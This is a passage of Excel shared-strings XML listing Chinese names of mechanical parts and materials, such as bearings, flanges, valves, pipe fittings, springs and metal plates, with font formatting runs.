        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木块加工角盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊夹具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹箍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍（两半）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形磁铁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凹字形楔键</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双耳吊钩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闩块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动轴承壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>径向轴承辊子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推滚动轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带辊子的止推轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推轴承辊子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁组合支撑板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非铁材料支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑用支撑底座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大于</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度支撑板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁材料大于</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非铁材料全方位支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小于</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度铁材料支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形支撑件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算机托架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右旋压紧弹簧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋压紧弹簧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母插销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带全螺纹的接座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有凹口的圆盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塑胶防护装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平面圆形防护装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢＋铸铁刮油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊材料密封环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木箱部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>50-74mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>100-&lt;mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>青铜板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型材铝板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>黄铜板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型材黄铜板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型材铅板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>石棉，可组合的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海绵状橡胶板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打孔网纹钢板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>波纹铝板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工空心棒料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非金属管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆铁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧钢丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢球，实心的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钨铬钴合金电极</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接填充</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>合金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>50</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电极</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>Cr/Ni</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>Cr</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘粉末</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器铜网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘夹子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰滑动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>松套法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形法兰毛坯</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形填料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三角形垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三角形法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直母接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公螺柱三通接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公螺柱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公直螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等径弯接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位直接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带压力计的减压阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自闭阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
